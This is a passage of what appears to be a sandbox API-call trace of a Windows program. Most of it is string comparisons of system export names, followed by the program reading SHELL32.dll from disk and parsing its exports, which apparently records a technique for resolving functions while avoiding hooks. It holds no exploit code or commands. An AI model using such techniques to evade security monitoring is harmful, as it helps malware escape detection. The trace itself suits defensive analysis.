returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0113.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0113.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.705] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.706] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0113.707] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.708] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0113.708] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0113.709] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0113.710] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.710] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0113.711] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0113.711] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0113.712] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0113.712] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0113.713] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0117.470] GetProcessHeap () returned 0x590000 [0117.470] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c6040 | out: hHeap=0x590000) returned 1 [0117.481] GetProcessHeap () returned 0x590000 [0117.481] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9260 [0117.481] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0117.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0117.482] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0117.482] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0117.482] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0117.482] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0117.482] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0117.482] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0117.482] GetProcessHeap () returned 0x590000 [0117.482] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1587258) returned 0x40c3040 [0118.035] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0118.035] ReadFile (in: hFile=0x140, lpBuffer=0x40c3040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c3040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0124.996] CloseHandle (hObject=0x140) returned 1 [0124.997] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0124.997] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0124.997] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0124.998] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0124.998] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0124.998] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0124.998] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0124.998] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0124.998] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0124.998] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0124.999] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0124.999] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0124.999] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0124.999] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0124.999] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0124.999] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0124.999] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0124.999] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0124.999] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.000] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0125.000] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0125.000] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.000] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0125.000] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.000] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", 